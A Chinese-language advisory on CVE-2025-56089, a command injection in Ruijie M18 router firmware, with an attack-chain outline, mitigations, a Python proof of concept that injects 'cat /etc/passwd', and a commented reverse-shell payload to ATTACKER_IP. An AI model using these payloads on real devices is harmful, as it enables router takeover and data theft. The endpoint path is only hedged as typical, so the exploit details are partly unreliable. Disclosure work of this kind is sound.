CVE-2025-56089: 锐捷M18路由器OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56089

漏洞类型

OS命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie M18 EW_3.0(1)B11P226_M18_10223116

漏洞概述

CVE-2025-56089是锐捷网络（ Ruijie Networks）生产的一款名为M18的路由器设备中发现的高危安全漏洞。该漏洞存在于设备的固件版本EW_3.0(1)B11P226_M18_10223116中，具体位于/usr/local/lua/dev_sta/nbr_cwmp.lua文件的module_set接口处。攻击者可以利用该漏洞通过发送精心构造的POST请求，在受影响设备上执行任意操作系统命令。由于该漏洞的CVSS评分达到8.8分，属于高危级别，且攻击复杂度低、权限要求低（仅需低权限用户），对网络环境的安全性构成严重威胁。此漏洞可能影响企业网络和家庭的无线网络环境，攻击者一旦成功利用，可以完全控制路由器设备，进而进行中间人攻击、数据窃取、植入恶意软件或进一步渗透内网等恶意活动。

技术细节

该漏洞属于典型的OS命令注入（OS Command Injection）漏洞，也称为命令注入或shell注入。在Web应用程序或嵌入式设备的固件开发过程中，开发人员有时需要调用系统命令来执行特定功能。如果应用程序直接接受用户输入并将其拼接到系统命令中执行，而没有对用户输入进行严格的过滤和验证，就会产生命令注入漏洞。在Ruijie M18设备中，/usr/local/lua/dev_sta/nbr_cwmp.lua文件内的module_set功能模块存在此问题。攻击者可以在POST请求的参数中注入带有分号、管道符或反引号等特殊字符的系统命令，设备在解析请求时会将这些恶意命令一并执行。例如，攻击者可以在参数值中插入类似';whoami;'或'|cat /etc/passwd'的命令片段，成功注入后即可获取系统权限或读取敏感文件。由于该路由器的管理接口通常暴露在网络中，攻击者可以在无需认证或仅需低权限账号的情况下发起攻击，实现远程代码执行。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标设备为Ruijie M18路由器，并确定其IP地址和运行版本EW_3.0(1)B11P226_M18_10223116

STEP 2

步骤2: 漏洞探测

攻击者访问设备的/module_set接口，确认该端点存在且可访问，通常位于/cgi-bin/luci/api/nbr_cwmp/module_set

STEP 3

步骤3: 构造恶意请求

攻击者构造包含OS命令注入payload的POST请求，利用分号、管道符或反引号等特殊字符注入系统命令

STEP 4

步骤4: 命令执行

发送恶意请求后，设备将用户输入拼接到系统命令中执行，攻击者注入的命令被成功执行

STEP 5

步骤5: 权限提升与持久化

攻击者可以获取设备的最高root权限，并可能植入后门程序实现持久化控制

STEP 6

步骤6: 横向移动

控制路由器后，攻击者可以监控网络流量、进行中间人攻击或进一步渗透内网中的其他设备

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-56089 PoC - Ruijie M18 OS Command Injection
# Target: Ruijie M18 EW_3.0(1)B11P226_M18_10223116
# Vulnerability: OS Command Injection in /usr/local/lua/dev_sta/nbr_cwmp.lua module_set

target_ip = "192.168.1.1"  # Replace with actual router IP
target_port = 80

url = f"http://{target_ip}:{target_port}/cgi-bin/luci/api/nbr_cwmp/module_set"

# Payload: Inject OS command to read /etc/passwd
# Using semicolon to chain commands
payload = {
    'module': 'test;cat /etc/passwd;',
    'device_id': 'test_device'
}

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0'
}

try:
    response = requests.post(url, data=payload, headers=headers, timeout=10)
    print(f"Status Code: {response.status_code}")
    print(f"Response:\n{response.text}")
except requests.exceptions.RequestException as e:
    print(f"Request failed: {e}")

# Reverse shell payload example:
# payload = {'module': 'test;bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1;', 'device_id': 'test'}
# This will establish a reverse shell connection to the attacker's machine

影响范围

Ruijie M18 EW_3.0(1)B11P226_M18_10223116

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）通过防火墙限制对路由器管理接口的访问，仅允许受信任的IP地址访问；2）禁用或限制CWMP/TR-069协议的使用，因为漏洞位于相关模块中；3）定期监控设备日志，查找异常命令执行迹象；4）考虑更换为已修复漏洞的设备型号或等待厂商发布官方修复方案；5）如果业务允许，可暂时关闭受影响的module_set功能模块以减少攻击面。